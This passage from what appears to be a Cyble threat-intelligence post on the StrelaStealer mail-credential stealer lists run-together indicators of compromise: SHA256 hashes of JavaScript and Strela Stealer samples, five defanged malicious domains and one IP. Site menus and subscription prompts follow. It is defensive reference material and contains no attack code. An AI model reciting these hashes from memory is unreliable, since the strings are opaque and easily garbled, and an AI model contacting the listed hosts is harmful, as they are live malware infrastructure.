5b8486ef5b5babb63704f32b4e3e949053b13a344440fe5149SHA256JavaScript68ffebea33905d680c382b4df481c564817044cf41345f41166cfaca106abfeeSHA256JavaScript6cb21cba9555eec2a173719188ffa609f3f99b6f615ada694db3e2de7fa4d9feSHA256JavaScript70f500e1941ce7f0ae0d4c12c44f3e265c701c1169193a55e5f842c093f303ccSHA256JavaScript72c9297608f3ccb059aec33126178e40bd343c3c24b14a8a31a7742757a08a00SHA256JavaScript760c12ae673ae8902dfa096c17bbce7fc3e20eec069b7cc00d6bf1dd4a28757bSHA256JavaScript76972fe36498d115bbcb742d842698fea1ebc062d0f79426dfbcaf4ad8bec0bdSHA256JavaScript78c315657a6dd2d6ca01388aa3575344b689cbd18c172d83fe94399156b8010bSHA256JavaScript7fcf23ad9d241ccd8f46a9a65bdd99741bade2bf323599f5639ebf160d35aa1eSHA256JavaScript8502cf3b180e3ee6e526b5b33e17647d7234773c278d9009a6ae58a01fd96b97SHA256JavaScript8661d72b99ae335b6c0c74e2d2f156f8611666fe7f118ae251e224c8602f72f2SHA256JavaScript8ba18307df322c7c930dc19ff5f3a36b6a9040cc0dd05e65c1a434887a407b70SHA256JavaScript9082620184a4fe05ed92a0e88caea02cfec14d4c6494dc55269d8afade95d352SHA256JavaScript9255e44bcf40afa3c3fbd19f13a1d277c3bd7bd457866e904b220779fadce886SHA256JavaScript93fc8a04b28af9feb86c348c9b3a7d8422729697832e6895f8738b663da32905SHA256JavaScript9a9303997fefb2de0a66db9652d53bce7d17b9a1e8e738ee91801a29f72621d6SHA256JavaScript9aefb3b5e3a0727c6d96b103c432acb57c42294373bbd8d984a8aeb94659cd43SHA256JavaScript9eb4a88bc7ba156af849fcd956744c65677372db5e5cb09115df8ec900928cbbSHA256JavaScript9fc8d64d8204045764d0990647d42cb386c98501199553d043c277133549193aSHA256JavaScripta09688c0ce051235e92bb938090eebedea57c706158e0b665edce17d8dbe7543SHA256JavaScripta0def4009d3d6444b05f8d4071a65fbba6b6b36176104fc1fbb04affd0282969SHA256JavaScripta21f6c960cb3a702a9cf1da645301688b98763a8d1a4269a6b010616477e742fSHA256JavaScripta76fc70044c88c9313da07e3afa039640373c639ac16ae85ddef201fa5995ce3SHA256JavaScripta77cd7dcea434bea2ce6dbc1af32668007c0fc5168a325c0c9df8f976d47ae0cSHA256JavaScriptb0f2cff2784b1779a9688a3cd43436d272683554b356d2a6f75903e40ce680edSHA256JavaScriptb2efbb7368a89a746f5f1aea8e3df16cb017b4f79e0a6c3c1aaf51a7437cdd1bSHA256JavaScriptb5f9dff76d3cdf16ad8c95e699a4dd347e2bf987d7b9a4601b4bb6b7505a560fSHA256JavaScriptc1503c63332d723bc67acdc8de2fbaffb92b11de8174030eaf863d7ed152f947SHA256JavaScriptc55f10a2633aa6c7f5e246cee23ed04e73896f88a042c070a6c66698dc8b1f3eSHA256JavaScriptca3a8107b0c1ecf1a9f258e5b155a652e81710a2fa910bfd5ed31305a10ed06fSHA256JavaScriptca6446b428305c1845b87a4562c4ef24d99e5929a2a65101689ca473b0bbec43SHA256JavaScriptd3b78c9fdf7df019c14a21c18f4ca27c4210f31191ba5f35de358373b4077d43SHA256JavaScriptd40dbeaf32abed1610e11408953ddddad985cea279b86c31a27b841519112bfbSHA256JavaScripte2fa1484fa6cccfdae5838e59f4516017c3cd15e4872db0e459c43c8c8076882SHA256JavaScriptea090dccb35324c998ac5c2e3e499ed4c3812372cd6936777a9b4d10f8329c65SHA256JavaScriptee5cee0d57239e192cde8a52398172b515148969e4f6fc4bcf89de24aedafd4bSHA256JavaScriptf2708c2b771610ecda87d43c409a943fc4df6cdb090737ea47017f5ea4fc6a85SHA256JavaScriptf68522b21d226a9d7ab91105e4412ea3ad836801e090e1e6dce766def233c607SHA256JavaScriptf85dbbb00236db3abcc3383f2708fa4f53f5a464a62c4338391f513f49ea8b76SHA256JavaScriptfc9617a69ee597606fbc68a5280819e48c9679b1d44d09f86cb4b62b68835209SHA256JavaScriptfd407ac4d456c2196b128587347d85856989faec188334a8fbc4469f4b4e6ef2SHA256JavaScriptfed183856e7f09bb9f73d8c9d57bd3573ec846da1a49dc1eeb295c845007f5a2SHA256JavaScriptffdf20ae5a3124a69711eb46b11b01bed6cffb66aef711732f96ddb4546cb635SHA256JavaScriptffe0ff011712afeb8ebc70e09bb455cc6fdd36c8d3b31004d25dc1cd8cc74b8fSHA256JavaScript04f2cd6ddf9faef579d303c5efd2fc65b9997e05c3f75ea9b0cfc474f5e9019aSHA256Strela
Stealer13d96ed827887f6c31d907a5ee29441e2afd95be683e51e874cf5ad8207c1a98SHA256Strela
Stealer1970d38e7fa45a46e792372a19d890541c87d1007ddedd53858b6df6728d72ffSHA256Strela
Stealerdbd301f710d45acdd639cda5cd47a5453b9abb8a361ed250bfc47de70318fec6SHA256Strela
Stealer13531bd403e5f8f607bf16144c38ffd94004eafa8e6a098628b915de07ba432bSHA256Strela
Stealer080caffde331496a46e8cb35acd107ed113046b46310747a2dd15a62efab23b5SHA256Strela
Stealerbd26724bdc8c5d9cb65d361231048725fbc31072d4c457c23531bc4333460011SHA256Strela
Stealer77836c0b18bbfef70fd04ba674ea045bf109851efe76ae9bcc55c2dcd08cc3c5SHA256Strela
Stealer03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311SHA256Strela
Stealercd39bec789b79d9ea6a642ab2ddc93121f5596de21e3b13c335ceaddb83f2083SHA256Strela
Stealerb9ae263904d3a5fb8471a0f8ab95fcbb224f632e6185e3a110e8d5aed9785420SHA256Strela
Stealervaultdocker[.]comDomainMaliciouscloudslimit[.]comDomainMaliciousdailywebstats[.]comDomainMaliciousendpointexperiment[.]comDomainMaliciousapitestlabs[.]comDomainMalicious94[.]159[.]113[.]48IPMalicious


REFERENCES

https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc
https://unit42.paloaltonetworks.com/strelastealer-campaign/


RELATED

INCREASE IN THE EXPLOITATION OF MICROSOFT SMARTSCREEN VULNERABILITY
CVE-2024-21412

Cyble analyzes an active campaign exploiting a Microsoft SmartScreen
vulnerability to deliver stealers via spam emails.

July 5, 2024

In "Exploit"

CAPCUT USERS UNDER FIRE

CRIL has uncovered a phishing campaign that targets unsuspecting CapCut users,
aiming to steal their sensitive information.

May 19, 2023

In "Phishing"

REDLINE STEALER BEING DISTRIBUTED VIA FAKE EXPRESS VPN SITES

Cyble Research and Intelligence Labs analyzes how threat actors deliver Redline
Stealer via Fake Express VPN sites.

November 30, 2022

In "Phishing"






GET THREAT ASSESSMENT REPORT

Identify External Threats Targeting Your Business
Get My Report
Free
Your browser does not support the video tag.
 * 
 * 




CISO’S GUIDE TO THREAT INTELLIGENCE 2024: BEST PRACTICES

Stay Ahead of Cyber Threats with Expert Insights and Strategies. Download Free
E-Book Now

Search for your darkweb exposure



Use Cyble's Largest Dark Web Monitoring Engine to Assess Your Exposure. Make
Sure You're Aware of the Risks by Searching Through Our 150,447,938,145 Records!
We Have Over 50,000 Data Breaches, Several Hacking Forums, Conversations
Indexed.

Download Now


Cybercrime Magazine · AI's Impact On Cybersecurity. Microsoft Recall & Beyond.
Beenu Arora, Co-Founder & CEO, Cyble.

Business Email Address*

Type your email…

Subscribe Now

Share the Post:

PrevPreviousRansomware Vulnerability Matrix: A Comprehensive Resource for
Cybersecurity Analysts 
NextThe Cybersecurity and Infrastructure Security Agency (CISA) Reports Urgent
Security Updates for Apple ProductsNext


RELATED POSTS

GOOGLE FIXES CRITICAL ZERO-DAY VULNERABILITIES IN LATEST ANDROID SECURITY UPDATE

November 6, 2024

GODFATHER MALWARE EXPANDS ITS REACH, TARGETING 500 BANKING AND CRYPTO
APPLICATIONS WORLDWIDE

November 6, 2024


QUICK LINKS

Main Menu

 * Home
 * About Us
 * Blog
 * Cyble Partner Network (CPN)
 * Press
 * Responsible Disclosure
 * Knowledge Hub
 * Sitemap

PRODUCTS

Main Menu

 * AmIBreached
 * Cyble Vision
 * Cyble Hawk
 * Cyble Odin
 * The Cyber Express

SOLUTIONS

Main Menu

 * Attack Surface Management
 * Brand Intelligence
 * Threat Intelligence Platform
 * Dark Web Monitoring
 * Takedown and Disruption
 * Vulnerability Management
 * Third-Party Risk Management (TPRM)
 * Physical Threat Intelligence
 * Executive Monitoring
 * Cloud Security Posture Management (CSPM)

PRIVACY POLICY

Main Menu

 * AmIBreached
 * Cyble Vision
 * Cyble Trust Portal

SCHEDULE A PERSONALIZED DEMO TO UNCOVER THREATS THAT NO ONE TELLS YOU

Book a Demo
© 2024. Cyble Inc.(#1 Threat Intelligence Platform Company). All Rights Reserved

Made with from Cupertino

Twitter Linkedin Youtube
Request a demo
Upcoming Events
Research Reports
Talk To Sales



START TYPING AND PRESS ENTER TO SEARCH

Begin Search...
Scroll to Top


DISCOVER MORE FROM CYBLE

Subscribe now to keep reading and get access to the full archive.

Type your email…

Subscribe

Continue reading

 

Loading Comments...

 

Write a Comment...
Email Name Website

We use cookies to ensure that we give you the best experience on our website. If
you continue to use this site we will assume that you are happy with it.Ok







Stay ahead in Cybersecurity with Cyble Research. You can unsubscribe at any
time.


AllowCancel